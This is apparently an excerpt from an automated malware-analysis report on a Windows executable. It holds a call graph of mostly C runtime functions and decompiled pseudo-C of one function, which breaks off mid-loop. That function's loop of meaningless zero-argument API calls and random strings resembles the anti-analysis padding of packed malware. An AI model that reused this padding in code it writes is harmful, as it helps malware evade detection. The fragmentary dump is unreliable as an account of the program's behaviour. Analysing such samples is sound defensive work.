15133->15127 15135 420d30 ___convertcp 12 API calls 15134->15135 15135->15125 15137 420d08 15136->15137 15138 420cff 15136->15138 15159 41cd90 15137->15159 15140 416ca0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 15138->15140 15141 41b5e6 15140->15141 15141->15115 15141->15116 15141->15125 15143 420d64 GetCPInfo 15142->15143 15150 420def __freea 15142->15150 15144 420d7d 15143->15144 15149 420d95 _strlen 15143->15149 15146 420d83 GetCPInfo 15144->15146 15144->15149 15145 416ca0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 15147 41b61e 15145->15147 15146->15149 15147->15122 15147->15125 15148 420dce MultiByteToWideChar 15148->15150 15151 420df6 _memset __MarkAllocaS _malloc 15148->15151 15149->15148 15149->15151 15150->15145 15151->15150 15152 420e57 MultiByteToWideChar 15151->15152 15152->15150 15153 420e7e 15152->15153 15154 420eb3 15153->15154 15155 420e84 WideCharToMultiByte 15153->15155 15156 420eb9 WideCharToMultiByte 15154->15156 15157 420ede 15154->15157 15155->15150 15156->15150 15156->15157 15157->15150 15158 420f01 WideCharToMultiByte 15157->15158 15158->15150 15162 422860 15159->15162 15163 42286e 15162->15163 15164 42288d 15162->15164 15165 4228b0 strtoxl 16 API calls 15163->15165 15166 4228b0 strtoxl 16 API calls 15164->15166 15167 41cda2 15165->15167 15166->15167 15167->15138 15168->15099 15169->15081 15171 40d96e 15170->15171 15172 40d9e4 _memset 15171->15172 15173 40d9b4 15171->15173 15175 40da79 15172->15175 15178 40daa9 _memset 15172->15178 15184 411a50 15173->15184 15176 411a50 __invalid_parameter 16 API calls 15175->15176 15177 40d9d7 _memset 15176->15177 15177->14968 15178->15177 15179 411a50 __invalid_parameter 16 API calls 15178->15179 15179->15177 15181 40ddeb 15180->15181 15182 40dded 15180->15182 15181->14968 15183 411ac0 __invoke_watson 10 API calls 15182->15183 15183->15181 15189 410200 TlsGetValue 15184->15189 15186 411a67 __invalid_parameter 15188 411a73 15186->15188 15197 411ac0 15186->15197 15188->15177 15190 41023e 15189->15190 15191 41021f 15189->15191 15193 4101b0 __crt_wait_module_handle 3 API calls 15190->15193 15196 41026f 15190->15196 15191->15190 15192 410228 TlsGetValue 15191->15192 15192->15190 15194 410251 15193->15194 15195 41025d GetProcAddress 15194->15195 15194->15196 15195->15196 15196->15186 15204 412d20 15197->15204 15199 411aef IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15200 411be9 GetCurrentProcess TerminateProcess 15199->15200 15201 411bd9 __invalid_parameter 15199->15201 15202 416ca0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 15200->15202 15201->15200 15203 411c05 15202->15203 15203->15188 15205 412d2c __VEC_memzero 15204->15205 15205->15199 15207 41982f 15206->15207 15208 41985d 15207->15208 15209 410110 __encode_pointer 7 API calls 15207->15209 15208->14973 15209->15207 15213 40aaa0 15210->15213 15214 40aad7 _doexit 15213->15214 15219 40ab20 15214->15219 15220 410200 __encode_pointer 6 API calls 15219->15220 15221 40ab33 15220->15221 15222 410200 __encode_pointer 6 API calls 15221->15222 15223 40ab45 15222->15223 15224 40aae7 15223->15224 15239 40c7a0 15223->15239 15236 40aafb 15224->15236 15226 40ac34 15227 410110 __encode_pointer 7 API calls 15226->15227 15229 40ac45 15227->15229 15230 410110 __encode_pointer 7 API calls 15229->15230 15230->15224 15231 40abcd 15231->15224 15233 40bba0 __realloc_dbg 57 API calls 15231->15233 15234 40ac03 15231->15234 15233->15234 15234->15224 15235 410110 __encode_pointer 7 API calls 15234->15235 15235->15226 15438 40fff0 15236->15438 15243 40c7e4 15239->15243 15240 40c80b 15244 411a50 __invalid_parameter 16 API calls 15240->15244 15241 40c83c 15242 40c85b 15241->15242 15256 40c9e0 15241->15256 15263 40cfa0 15242->15263 15243->15240 15243->15241 15246 40ab73 15244->15246 15246->15226 15246->15231 15250 40bba0 15246->15250 15249 40c8b5 15269 40c966 15249->15269 15251 40bbd9 15250->15251 15288 40bc40 15251->15288 15253 40bbfe 15299 40bc12 15253->15299 15257 40ca26 15256->15257 15261 40ca1c 15256->15261 15272 413bd0 15257->15272 15260 40ca3c 15262 40cb50 _CheckBytes 15260->15262 15279 40ce05 15260->15279 15261->15242 15262->15242 15264 40cfac ___sbh_verify_block 15263->15264 15265 40cfb3 __CrtIsValidHeapPointer 15263->15265 15264->15249 15265->15264 15266 40d020 HeapValidate 15265->15266 15267 40cfd7 ___sbh_find_block 15265->15267 15266->15264 15267->15264 15268 40d006 HeapValidate 15267->15268 15268->15264 15287 40e180 LeaveCriticalSection 15269->15287 15271 40c96d 15271->15246 15273 413c4c HeapValidate 15272->15273 15276 413c12 ___sbh_heap_check 15272->15276 15274 413c60 GetLastError 15273->15274 15275 413c6b ___doserrno 15273->15275 15274->15275 15275->15260 15282 413c41 15276->15282 15286 40e180 LeaveCriticalSection 15279->15286 15281 40ce0c 15281->15261 15285 40e180 LeaveCriticalSection 15282->15285 15284 413c3f 15284->15273 15285->15284 15286->15281 15287->15271 15289 40bc7a 15288->15289 15298 40bc5d _memset 15288->15298 15290 40c9e0 __CrtCheckMemory 3 API calls 15289->15290 15292 40bcbc _CheckBytes 15289->15292 15289->15298 15290->15292 15291 40cfa0 __CrtIsValidHeapPointer 2 API calls 15293 40beca 15291->15293 15292->15291 15292->15298 15294 40bfb3 15293->15294 15295 40bfd8 15293->15295 15293->15298 15302 413700 15294->15302 15331 413430 15295->15331 15298->15253 15437 40e180 LeaveCriticalSection 15299->15437 15301 40bc10 15301->15231 15303 41374f 15302->15303 15304 41373e 15302->15304 15306 413755 15303->15306 15307 413768 15303->15307 15348 412e40 15304->15348 15355 413aa0 15306->15355 15314 4139d2 15307->15314 15329 413775 __fwrite_nolock ___sbh_resize_block ___sbh_find_block 15307->15329 15309 413a07 15313 412ce0 __callnewh 6 API calls 15309->15313 15310 41391e 15376 412ce0 15310->15376 15312 4139ec HeapReAlloc 15312->15314 15326 413747 __get_errno_from_oserr 15313->15326 15314->15309 15314->15312 15315 413a31 15314->15315 15317 412ce0 __callnewh 6 API calls 15314->15317 15319 413a66 GetLastError 15314->15319 15314->15326 15316 413a39 GetLastError 15315->15316 15315->15326 15316->15326 15317->15314 15319->15326 15320 41385c HeapAlloc 15320->15329 15321 4138f6 HeapReAlloc 15321->15329 15323 41394b 15325 413959 GetLastError 15323->15325 15323->15326 15324 412ce0 __callnewh 6 API calls 15324->15329 15325->15326 15326->15298 15327 413996 15327->15326 15328 41399c GetLastError 15327->15328 15328->15326 15329->15310 15329->15320 15329->15321 15329->15323 15329->15324 15329->15327 15330 413dd0 VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 15329->15330 15367 414390 15329->15367 15373 4138d8 15329->15373 15330->15329 15332 413474 15331->15332 15333 4134c5 15332->15333 15334 413498 15332->15334 15335 4135b5 HeapSize HeapReAlloc 15333->15335 15339 4134ea ___sbh_resize_block ___sbh_find_block 15333->15339 15341 4134bb __get_errno_from_oserr 15333->15341 15337 411a50 __invalid_parameter 16 API calls 15334->15337 15338 4135ff 15335->15338 15335->15341 15337->15341 15340 413621 GetLastError 15338->15340 15427 413650 15338->15427 15424 41354e 15339->15424 15340->15341 15341->15298 15346 41356c HeapReAlloc 15346->15341 15347 413598 GetLastError 15346->15347 15347->15341 15349 412e96 15348->15349 15352 412e53 15348->15352 15350 412ce0 __callnewh 6 API calls 15349->15350 15353 412e68 15350->15353 15352->15353 15354 412ce0 __callnewh 6 API calls 15352->15354 15379 412ed0 15352->15379 15353->15326 15354->15352 15356 413ae4 15355->15356 15359 413adf __get_errno_from_oserr 15355->15359 15357 413b7c HeapFree 15356->15357 15360 413af1 ___sbh_find_block 15356->15360 15358 413b97 GetLastError 15357->15358 15357->15359 15358->15359 15359->15326 15361 413b24 15360->15361 15397 413dd0 15360->15397 15404 413b35 15361->15404 15365 413b46 HeapFree 15365->15359 15366 413b62 GetLastError 15365->15366 15366->15359 15371 4143c8 15367->15371 15368 4144d4 15370 4144dd 15368->15370 15419 4149c0 15368->15419 15370->15329 15371->15368 15371->15370 15412 4148b0 15371->15412 15423 40e180 LeaveCriticalSection 15373->15423 15375 4138df 15375->15329 15377 410200 __encode_pointer 6 API calls 15376->15377 15378 412cf1 15377->15378 15378->15326 15380 412ee1 15379->15380 15390 412efa 15379->15390 15389 40ffb0 ___crtExitProcess 3 API calls 15380->15389 15381 412f32 15387 412f44 15381->15387 15391 412da0 15381->15391 15382 412f06 RtlAllocateHeap 15388 412f50 15382->15388 15383 412f62 HeapAlloc 15383->15388 15384 412f5b 15384->15383 15387->15383 15387->15384 15387->15388 15388->15352 15389->15390 15390->15381 15390->15382 15392 412de4 15391->15392 15396 412e10 15391->15396 15393 414390 ___sbh_alloc_block 5 API calls 15392->15393 15394 412dfe 15393->15394 15395 412e12 _V6_HeapAlloc LeaveCriticalSection 15394->15395 15395->15396 15396->15387 15398 413e2d 15397->15398 15400 413e28 15397->15400 15399 414233 VirtualFree 15398->15399 15398->15400 15401 4142c0 15399->15401 15400->15361 15401->15400 15402 4142e4 VirtualFree HeapFree 15401->15402 15407 41acb0 15402->15407 15411 40e180 LeaveCriticalSection 15404->15411 15406 413b33 15406->15359 15406->15365 15408 41acc8 15407->15408 15409 41acf7 15408->15409 15410 41acef __VEC_memcpy 15408->15410 15409->15400 15410->15409 15411->15406 15413 4148c3 HeapReAlloc 15412->15413 15414 41490d HeapAlloc 15412->15414 15415 4148f5 15413->15415 15416 4148ee 15413->15416 15414->15416 15417 414945 VirtualAlloc 15414->15417 15415->15414 15416->15368 15417->15416 15418 414968 HeapFree 15417->15418 15418->15416 15421 4149e1 VirtualAlloc 15419->15421 15422 414a71 15421->15422 15422->15370 15423->15375 15436 40e180 LeaveCriticalSection 15424->15436 15426 41354c 15426->15341 15426->15346 15428 413668 GetModuleHandleW 15427->15428 15433 413691 15427->15433 15429 41367c GetProcAddress 15428->15429 15428->15433 15431 410110 __encode_pointer 7 API calls 15429->15431 15430 4101e0 _doexit 7 API calls 15432 4136a8 15430->15432 15431->15433 15434 413615 15432->15434 15435 410200 __encode_pointer 6 API calls 15432->15435 15433->15430 15434->15340 15434->15341 15435->15434 15436->15426 15437->15301 15441 40e180 LeaveCriticalSection 15438->15441 15440 40aaf9 15440->14975 15441->15440 15443 40b224 GetLastError 15442->15443 15444 40b22f __dosmaperr 15442->15444 15443->15444 15444->14985 15446 40b00b 15445->15446 15447 40b05d 15446->15447 15448 40b02f 15446->15448 15517 410b60 15447->15517 15451 411a50 __invalid_parameter 16 API calls 15448->15451 15450 40b066 15454 40b08e 15450->15454 15521 4119c0 15450->15521 15458 409ff6 15451->15458 15453 40b177 15455 40b19f 15453->15455 15525 410e90 15453->15525 15454->15453 15459 411a50 __invalid_parameter 16 API calls 15454->15459 15539 40b1ec 15455->15539 15460 40acf0 15458->15460 15459->15453 15461 40ad3b 15460->15461 15462 40ad5f 15461->15462 15464 40ad8d __flswbuf 15461->15464 15463 411a50 __invalid_parameter 16 API calls 15462->15463 15465 409ffd 15463->15465 15466 4119c0 __fileno 16 API calls 15464->15466 15467 40adb0 15464->15467 15465->14991 15466->15467 15468 40aea4 __flswbuf 15467->15468 15469 40ae76 15467->15469 15667 410bc0 15468->15667 15470 411a50 __invalid_parameter 16 API calls 15469->15470 15470->15465 15472 40aeb4 __flswbuf 15670 410ca0 15472->15670 15474 40aecc __flswbuf _strlen 15676 411150 15474->15676 15477 40af27 __flswbuf 15692 410e00 15477->15692 15480 40aef9 __flswbuf 15480->15477 15481 410e90 __flsbuf 51 API calls 15480->15481 15481->15477 15483 40ea90 ___lock_fhandle 3 API calls 15482->15483 15484 40a972 _strlen 15483->15484 15485 40ef00 __write_nolock 47 API calls 15484->15485 15489 40a9b9 __get_sys_err_msg _strlen 15484->15489 15486 40a9a6 15485->15486 15487 40ef00 __write_nolock 47 API calls 15486->15487 15487->15489 15488 40ef00 __write_nolock 47 API calls 15490 40a9e9 15488->15490 15489->15488 15491 40ef00 __write_nolock 47 API calls 15490->15491 15492 40a9fc 15491->15492 15712 40aa0d 15492->15712 15495->15002 15497 409b40 14 API calls 15496->15497 15498 409c0d 15496->15498 15497->15498 15498->15006 15499->15010 15501 409d80 GetLastError 15500->15501 15502 409dbd GetLastError 15501->15502 15503 409d8f SetConsoleTextAttribute DebugBreak SetCalendarInfoA WriteProfileSectionW 15501->15503 15504 409e34 15502->15504 15505 409dcf 8 API calls 15502->15505 15503->15502 15504->15501 15506 409e4f 15504->15506 15505->15504 15716 409990 15506->15716 15508 409e79 GlobalFix 15509 409e66 15508->15509 15509->15508 15510 409e9a 15509->15510 15511 409ecc TerminateProcess GetUserDefaultLangID WritePrivateProfileStringA GetNamedPipeHandleStateW 15510->15511 15512 409f07 15510->15512 15511->15510 15724 4088f0 LoadLibraryA 15512->15724 15514 409f0c 15515 409f20 12 API calls 15514->15515 15516 409fc7 15514->15516 15515->15516 15516->15013 15516->15014 15518 410ba2 EnterCriticalSection 15517->15518 15519 410b6e 15517->15519 15520 410b77 15518->15520 15519->15518 15519->15520 15520->15450 15523 4119d8 15521->15523 15522 411a1f 15522->15454 15523->15522 15524 411a50 __invalid_parameter 16 API calls 15523->15524 15524->15522 15526 410e9e 15525->15526 15527 4119c0 __fileno 16 API calls 15526->15527 15532 410ecb __flswbuf 15527->15532 15528 410fe8 __getbuf 15529 411106 15528->15529 15530 41100d 15528->15530 15531 40ecd0 __write 51 API calls 15529->15531 15533 41106c 15530->15533 15537 411088 15530->15537 15536 410edf 15531->15536 15532->15528 15532->15536 15542 419400 15532->15542 15549 40ecd0 15533->15549 15536->15455 15537->15536 15563 4194e0 15537->15563 15660 410c00 15539->15660 15543 419420 15542->15543 15548 41940e 15542->15548 15544 419471 15543->15544 15545 41949b 15543->15545 15547 411a50 __invalid_parameter 16 API calls 15544->15547 15545->15548 15577 41f170 IsDebuggerPresent 15545->15577 15547->15548 15548->15528 15550 40ed26 15549->15550 15558 40ed08 ___doserrno 15549->15558 15551 40edb0 15550->15551 15553 40ed77 ___doserrno 15550->15553 15552 40ee36 15551->15552 15556 40edfd ___doserrno 15551->15556 15583 40ea90 15552->15583 15557 411a50 __invalid_parameter 16 API calls 15553->15557 15560 411a50 __invalid_parameter 16 API calls 15556->15560 15557->15558 15558->15536 15560->15558 15561 40ee7a ___doserrno 15635 40eecf 15561->15635 15564 419547 15563->15564 15576 419526 ___doserrno 15563->15576 15565 4195d4 15564->15565 15568 419598 ___doserrno 15564->15568 15566 419621 ___doserrno 15565->15566 15567 41965d 15565->15567 15573 411a50 __invalid_parameter 16 API calls 15566->15573 15569 40ea90 ___lock_fhandle 3 API calls 15567->15569 15570 411a50 __invalid_parameter 16 API calls 15568->15570 15571 419666 15569->15571 15570->15576 15572 419730 __lseeki64_nolock 18 API calls 15571->15572 15574 4196a5 ___doserrno 15571->15574 15572->15574 15573->15576 15656 419704 15574->15656 15576->15536 15578 41f184 15577->15578 15579 41f17a 15577->15579 15578->15548 15581 41f1a0 RaiseException 15579->15581 15582 41f20d 15581->15582 15582->15578 15584 40eaeb 15583->15584 15590 40eb3f 15583->15590 15587 417180 ___crtInitCritSecAndSpinCount InitializeCriticalSectionAndSpinCount 15584->15587 15589 40eb16 15584->15589 15585 40eb52 EnterCriticalSection 15586 40eb73 15585->15586 15586->15561 15591 40ef00 15586->15591 15587->15589 15638 40eb41 15589->15638 15590->15585 15590->15586 15592 40ef0f ___crtMessageWindowW 15591->15592 15596 40efb0 15592->15596 15597 40ef77 ___doserrno 15592->15597 15620 40ef3a ___doserrno __dosmaperr 15592->15620 15593 416ca0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 15594 40fa3c 15593->15594 15594->15561 15595 40f052 15598 40f081 15595->15598 15642 419730 15595->15642 15596->15595 15603 40f019 ___doserrno 15596->15603 15601 411a50 __invalid_parameter 16 API calls 15597->15601 15600 419400 __isatty 18 API calls 15598->15600 15605 40f08d 15600->15605 15601->15620 15602 40f0f8 15604 40f4c2 15602->15604 15606 40f114 GetConsoleCP 15602->15606 15607 411a50 __invalid_parameter 16 API calls 15603->15607 15608 40f954 WriteFile 15604->15608 15609 40f4e9 15604->15609 15605->15602 15611 40f0bc GetConsoleMode 15605->15611 15627 40f131 __write_nolock 15606->15627 15607->15620 15610 40f995 GetLastError 15608->15610 15608->15620 15612 40f63b 15609->15612 15613 40f4fc 15609->15613 15610->15620 15611->15602 15614 40f648 15612->15614 15628 40f78b 15612->15628 15615 40f5c6 WriteFile 15613->15615 15613->15620 15617 40f716 WriteFile 15614->15617 15614->15620 15615->15613 15619 40f626 GetLastError 15615->15619 15616 40f32d WideCharToMultiByte 15616->15620 15622 40f359 WriteFile 15616->15622 15617->15614 15621 40f776 GetLastError 15617->15621 15618 40f85e WideCharToMultiByte 15623 40f8a5 GetLastError 15618->15623 15618->15628 15619->15620 15620->15593 15621->15620 15625 40f3a6 GetLastError 15622->15625 15622->15627 15623->15620 15624 419370 MultiByteToWideChar MultiByteToWideChar __fassign 15624->15627 15625->15620 15626 40f8c2 WriteFile 15626->15628 15629 40f918 GetLastError 15626->15629 15627->15616 15627->15620 15627->15624 15630 40f460 GetLastError 15627->15630 15631 40f3ba WriteFile 15627->15631 15633 419050 11 API calls __write_nolock 15627->15633 15634 40f4ad GetLastError 15627->15634 15628->15618 15628->15620 15628->15626 15629->15628 15630->15620 15631->15627 15632 40f418 GetLastError 15631->15632 15632->15620 15633->15627 15634->15620 15655 40eb90 LeaveCriticalSection 15635->15655 15637 40eed8 15637->15558 15641 40e180 LeaveCriticalSection 15638->15641 15640 40eb48 15640->15590 15641->15640 15648 40e920 15642->15648 15644 41974d 15645 419794 SetFilePointer 15644->15645 15646 419759 __dosmaperr 15644->15646 15645->15646 15647 4197b3 GetLastError 15645->15647 15646->15598 15647->15646 15649 40e92e ___doserrno 15648->15649 15650 40e94c 15648->15650 15649->15644 15651 40e9a0 ___doserrno 15650->15651 15653 40e9dc ___doserrno 15650->15653 15652 411a50 __invalid_parameter 16 API calls 15651->15652 15652->15649 15653->15649 15654 411a50 __invalid_parameter 16 API calls 15653->15654 15654->15649 15655->15637 15659 40eb90 LeaveCriticalSection 15656->15659 15658 41970d 15658->15576 15659->15658 15661 410c42 LeaveCriticalSection 15660->15661 15662 410c0e 15660->15662 15664 40b1f5 15661->15664 15662->15661 15663 410c17 15662->15663 15666 40e180 LeaveCriticalSection 15663->15666 15664->15458 15666->15664 15668 410bee EnterCriticalSection 15667->15668 15669 410bcb 15667->15669 15668->15669 15669->15472 15671 410cae 15670->15671 15672 4119c0 __fileno 16 API calls 15671->15672 15673 410cdb 15672->15673 15674 419400 __isatty 18 API calls 15673->15674 15675 410ce4 __flswbuf 15674->15675 15675->15474 15677 41115e 15676->15677 15688 411164 15676->15688 15678 4111a1 15677->15678 15679 4111ce 15677->15679 15677->15688 15682 411a50 __invalid_parameter 16 API calls 15678->15682 15680 411231 15679->15680 15681 411204 15679->15681 15683 41126a 15680->15683 15691 411297 __fwrite_nolock 15680->15691 15684 411a50 __invalid_parameter 16 API calls 15681->15684 15682->15688 15685 411a50 __invalid_parameter 16 API calls 15683->15685 15684->15688 15685->15688 15686 410e90 __flsbuf 51 API calls 15686->15691 15688->15480 15689 4119c0 __fileno 16 API calls 15689->15691 15690 40ecd0 __write 51 API calls 15690->15691 15691->15686 15691->15688 15691->15689 15691->15690 15700 419b80 15691->15700 15693 410e0c 15692->15693 15694 419b80 __flush 51 API calls 15693->15694 15695 40af85 15693->15695 15694->15695 15696 40af96 15695->15696 15697 40af9b __flswbuf 15696->15697 15706 410c60 15697->15706 15701 419ba3 15700->15701 15705 419be2 15700->15705 15702 4119c0 __fileno 16 API calls 15701->15702 15701->15705 15703 419bd9 15702->15703 15704 40ecd0 __write 51 API calls 15703->15704 15704->15705 15705->15691 15707 410c6b 15706->15707 15708 410c8e LeaveCriticalSection 15706->15708 15711 40e180 LeaveCriticalSection 15707->15711 15710 40afa6 15708->15710 15710->15465 15711->15710 15715 40eb90 LeaveCriticalSection 15712->15715 15714 40aa0b 15714->14982 15715->15714 15717 4099a5 VerLanguageNameA SetDefaultCommConfigW ReadConsoleOutputCharacterW 15716->15717 15721 4099e5 15716->15721 15717->15721 15718 409b22 15718->15509 15719 409a29 BuildCommDCBAndTimeoutsA CopyFileExW GetCompressedFileSizeW 15719->15721 15720 409a74 FindNextFileW SetEvent 15720->15721 15721->15718 15721->15719 15721->15720 15722 409a93 6 API calls 15721->15722 15723 409af1 FillConsoleOutputCharacterA 15721->15723 15722->15721 15723->15721 15724->15514 15728 40fda7 _doexit 15725->15728 15726 40ff1a 15766 40ff28 15726->15766 15728->15726 15730 410200 __encode_pointer 6 API calls 15728->15730 15733 40fe5a __initterm 15728->15733 15731 40fde3 15730->15731 15731->15733 15735 410200 __encode_pointer 6 API calls 15731->15735 15732 40fb72 15732->14909 15733->15726 15746 40ce40 15733->15746 15734 40fff0 _doexit LeaveCriticalSection 15737 40ff4b 15734->15737 15745 40fdff 15735->15745 15739 40ffb0 ___crtExitProcess 3 API calls 15737->15739 15739->15732 15741 40ff15 15761 40d8c0 15741->15761 15743 4101e0 7 API calls _doexit 15743->15745 15744 410200 6 API calls __encode_pointer 15744->15745 15745->15733 15745->15743 15745->15744 15748 40ce80 15746->15748 15747 40ced1 15750 411a50 __invalid_parameter 16 API calls 15747->15750 15748->15747 15749 40cf01 15748->15749 15770 40cf66 15749->15770 15752 40cef7 15750->15752 15752->15726 15753 40fc20 15752->15753 15754 40fc30 15753->15754 15755 410200 __encode_pointer 6 API calls 15754->15755 15756 40fcf1 15755->15756 15757 4101e0 _doexit 7 API calls 15756->15757 15758 40fd16 InterlockedDecrement 15757->15758 15759 40fd52 InterlockedIncrement 15758->15759 15760 40fd2b 15758->15760 15759->15741 15760->15759 15774 40d040 15761->15774 15763 40d8d1 15765 40d918 15763->15765 15781 40d260 15763->15781 15765->15726 15767 40ff26 15766->15767 15768 40ff2e 15766->15768 15767->15732 15767->15734 15769 40fff0 _doexit LeaveCriticalSection 15768->15769 15769->15767 15773 40e180 LeaveCriticalSection 15770->15773 15772 40cf6d 15772->15752 15773->15772 15775 40d084 15774->15775 15776 40d0ab 15775->15776 15780 40d0d9 15775->15780 15777 411a50 __invalid_parameter 16 API calls 15776->15777 15778 40d0d1 15777->15778 15778->15763 15785 40d23b 15780->15785 15782 40d27b __mbtowc_l 15781->15782 15789 40d3c0 15782->15789 15784 40d28d _LocaleUpdate::~_LocaleUpdate 15784->15765 15788 40e180 LeaveCriticalSection 15785->15788 15787 40d242 15787->15778 15788->15787 15790 40d400 15789->15790 15791 40d67c 15790->15791 15794 40d460 __CrtIsValidHeapPointer 15790->15794 15815 40d68a 15791->15815 15793 40d688 15793->15784 15795 40d4d2 15794->15795 15796 40d4bf IsBadReadPtr 15794->15796 15806 40d49a 15794->15806 15797 40d5d9 15795->15797 15798 40d556 15795->15798 15796->15795 15799 40d61d 15797->15799 15800 40d5e2 15797->15800 15801 40d5c4 15798->15801 15802 40d598 IsBadReadPtr 15798->15802 15805 40d6d0 __printMemBlockData 10 API calls 15799->15805 15799->15806 15804 40d6d0 __printMemBlockData 10 API calls 15800->15804 15807 40d6d0 15801->15807 15802->15801 15802->15806 15804->15806 15805->15806 15806->15784 15808 40d6ee 15807->15808 15809 40d727 __mbtowc_l __isctype_l _swprintf_s __chvalidator_l 15808->15809 15810 40d82d _LocaleUpdate::~_LocaleUpdate 15808->15810 15813 40d81b 15809->15813 15818 40d870 15809->15818 15811 416ca0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 15810->15811 15812 40d86a 15811->15812 15812->15806 15813->15806 15822 40e180 LeaveCriticalSection 15815->15822 15817 40d691 15817->15793 15819 40d88b 15818->15819 15820 40d87b 15818->15820 15819->15813 15820->15819 15821 411ac0 __invoke_watson 10 API calls 15820->15821 15821->15819 15822->15817

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 409fd0-409fe4 call 40b260 3 40a015-40a037 0->3 4 409fe6-40a012 call 40b210 call 40afc0 call 40acf0 call 40ac70 call 40aa70 call 40a930 0->4 5 40a040-40a047 3->5 4->3 7 40a12b-40a130 5->7 8 40a04d-40a127 GetBinaryTypeW GetConsoleAliasExesA InitializeCriticalSection EnterCriticalSection GetNumberFormatW WriteConsoleOutputCharacterA ReadConsoleW SetThreadPriority FindNextVolumeMountPointW SetProcessShutdownParameters GetConsoleAliasesLengthW SetProcessAffinityMask OpenFileMappingW OpenWaitableTimerW AreFileApisANSI CancelDeviceWakeupRequest FindFirstVolumeA 5->8 10 40a132-40a13c 7->10 11 40a144-40a14a 7->11 8->7 10->5 13 40a142 10->13 14 40a150-40a160 11->14 13->14 16 40a162-40a168 14->16 19 40a16a-40a178 GetLastError GetCharWidthA 16->19 20 40a17e-40a185 16->20 19->20 22 40a1b0-40a1c0 20->22 23 40a187-40a1aa GetConsoleAliasesLengthA WinHttpConnect AlphaBlend 20->23 25 40a1f2-40a1f9 22->25 26 40a1c2-40a1ca 22->26 23->22 25->16 27 40a1ff-40a21d 25->27 26->25 29 40a1cc-40a1d4 26->29 30 40a220-40a226 27->30 29->25 32 40a1d6-40a1dd 29->32 33 40a232-40a239 30->33 34 40a228-40a22d call 409c60 30->34 32->25 36 40a1df-40a1ec GetComputerNameW 32->36 38 40a3bc-40a3c7 33->38 39 40a23f-40a3b8 TlsFree WriteConsoleOutputCharacterA LoadLibraryW DeleteAtom GetModuleHandleW GetPrivateProfileStringA FreeEnvironmentStringsA ResetWriteWatch MoveFileA GetConsoleAliasExesLengthW EnumSystemLocalesW _lopen _lwrite SetSystemTimeAdjustment DebugBreak MoveFileWithProgressA SetCommState EnumDateFormatsA CreateMailslotW WriteConsoleInputW GetConsoleAliasExesLengthA SetComputerNameW GlobalGetAtomNameA AllocConsole GetQueuedCompletionStatus GetProfileStringW GetSystemWindowsDirectoryA SetConsoleCP VerSetConditionMask EnumDateFormatsA 33->39 34->33 36->25 38->30 41 40a3cd-40a3da call 409d30 38->41 39->38 44 40a3e0-40a3e7 41->44 45 40a3e9-40a3ed SetThreadAffinityMask 44->45 46 40a3ef-40a3f5 44->46 45->46 47 40a403-40a40a 46->47 48 40a3f7-40a3fd 46->48 47->44 49 40a40c-40a42c 47->49 48->47 50 40a430-40a43a 49->50 51 40a444-40a44b 50->51 52 40a43c-40a43e FreeEnvironmentStringsA 50->52 53 40a4a4-40a4a9 51->53 54 40a44d-40a49e EnumCalendarInfoA lstrcatA LocalAlloc FormatMessageW WriteConsoleInputW GlobalWire GetPrivateProfileSectionNamesA 51->54 52->51 53->50 55 40a4ab-40a4b3 53->55 54->53 56 40a4c4-40a4d9 call 409c70 call 409d50 55->56 57 40a4b5-40a4c2 call 409b30 55->57 64 40a5cb-40a5d8 call 409c40 56->64 65 40a4df-40a5c5 WriteConsoleA ReadConsoleW DebugBreak LoadLibraryW lstrlenA EnumResourceTypesA OutputDebugStringW _lwrite GetConsoleAliasA CreateActCtxW GetPrivateProfileStringA GetACP CopyFileA GetSystemWindowsDirectoryA InterlockedExchangeAdd ContinueDebugEvent SetConsoleCursorPosition GetConsoleAliasExesLengthA 56->65 57->56 65->64
                            C-Code - Quality: 78%
                            			E00409FD0(short _a2, long _a4, intOrPtr _a8, long _a12, long _a16, intOrPtr _a32, void _a52, char _a56, char _a60, short _a1056, char _a1076, short _a1080, void _a1084, char _a3104, char _a3108, char _a3132, short _a4148) {
                            				long _v0;
                            				long _v4;
                            				long _v16;
                            				long _v24;
                            				struct _COORD _v32;
                            				intOrPtr _v48;
                            				long _t48;
                            				intOrPtr* _t138;
                            				void* _t142;
                            				intOrPtr _t143;
                            				intOrPtr _t156;
                            				intOrPtr _t160;
                            				intOrPtr* _t169;
                            				long _t170;
                            				void* _t177;
                            				void* _t179;
                            				void* _t181;
                            				void* _t189;
                            				void* _t216;
                            				void* _t217;
                            
                            				E0040B260(0x183c);
                            				if( *0x6328e4 == 0x177) {
                            					E0040B210(_t142, 0);
                            					E0040AFC0(_t142, 0, 0);
                            					E0040ACF0(_t142, 0);
                            					E0040AC70(0);
                            					E0040AA70(_t142, 0);
                            					E0040A930(0);
                            					_t189 = _t189 + 0x1c;
                            				}
                            				_t48 = 0;
                            				_t169 = __imp__GetConsoleAliasExesA;
                            				_v0 = 0;
                            				L3:
                            				L3:
                            				if( *0x6328e4 == 0x47) {
                            					GetBinaryTypeW(0,  &_a16);
                            					 *_t169( &_a3132, 0);
                            					InitializeCriticalSection( &_a12);
                            					EnterCriticalSection(0);
                            					GetNumberFormatW(0, 0, 0, 0,  &_a4148, 0);
                            					_v0 = 0;
                            					_a2 = 0;
                            					WriteConsoleOutputCharacterA(0, 0, 0, _v0,  &_a4);
                            					ReadConsoleW(0,  &_a52, 0,  &_v4, 0);
                            					SetThreadPriority(0, 0);
                            					__imp__FindNextVolumeMountPointW(0,  &_a1076, 0);
                            					SetProcessShutdownParameters(0, 0);
                            					__imp__GetConsoleAliasesLengthW(0);
                            					SetProcessAffinityMask(0, 0);
                            					OpenFileMappingW(0, 0, L"wirerulaniwojujicuwuk");
                            					OpenWaitableTimerW(0, 0, 0);
                            					AreFileApisANSI();
                            					CancelDeviceWakeupRequest(0);
                            					__imp__FindFirstVolumeA(0, 0);
                            					_t48 = _v32;
                            				}
                            				if(_t48 == 0x6a1) {
                            					goto L8;
                            				}
                            				_t48 = _t48 + 1;
                            				_v0 = _t48;
                            				if(_t48 < 0x1137686) {
                            					goto L3;
                            				} else {
